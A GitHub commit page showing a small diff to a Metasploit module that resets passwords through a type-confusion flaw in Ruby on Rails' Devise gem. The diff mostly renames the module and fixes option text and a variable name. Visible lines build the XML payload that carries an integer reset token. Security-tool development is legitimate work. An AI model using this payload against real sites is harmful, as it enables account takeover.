Skip to content

Commit 61ffced

Browse files
committed
Address HD's other comments, fixes mismatched var name in last commit.
1 parent e72dc47 commit 61ffced

File tree

1 file changed

+5
-5
lines changed

1 file changed

+5
-5
lines changed

modules/auxiliary/admin/http/rails_devise_pass_reset.rb

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary
1414

1515
def initialize(info = {})
1616
super(update_info(info,
17-
'Name' => 'Rails Devise Authentication Gem Password Reset',
17+
'Name' => 'Ruby on Rails Devise Authentication Password Reset',
1818
'Description' => %q{
1919
The Devise authentication gem for Ruby on Rails is vulnerable
2020
to a password reset exploit leveraging type confusion. By submitting XML
@@ -48,10 +48,10 @@ def initialize(info = {})
4848
register_options(
4949
[
5050
OptString.new('URIPATH', [ true, "The request URI", '/users/password']),
51-
OptString.new('TARGETEMAIL', [true, "The Email address of target account", '']),
52-
OptString.new('PASSWORD', [true, 'The password to set', "#{Rex::Text.rand_text_alpha(rand(10) + 5)}"]),
51+
OptString.new('TARGETEMAIL', [true, "The email address of target account"]),
52+
OptString.new('PASSWORD', [true, 'The password to set']),
5353
OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]),
54-
OptInt.new('MAXINT', [true, "Max integer to try (Tokens begining with a higher int will fail)", 10])
54+
OptInt.new('MAXINT', [true, "Max integer to try (tokens begining with a higher int will fail)", 10])
5555
], self.class)
5656
end
5757

@@ -88,7 +88,7 @@ def reset_one(password, report=false)
8888

8989
xml = ""
9090
xml << "<user>"
91-
xml << "<password>#{xmlpass}</password>"
91+
xml << "<password>#{encode_pass}</password>"
9292
xml << "<password_confirmation>#{encode_pass}</password_confirmation>"
9393
xml << "<reset_password_token type=\"integer\">#{int_to_try}</reset_password_token>"
9494
xml << "</user>"

0 commit comments

Comments
 (0)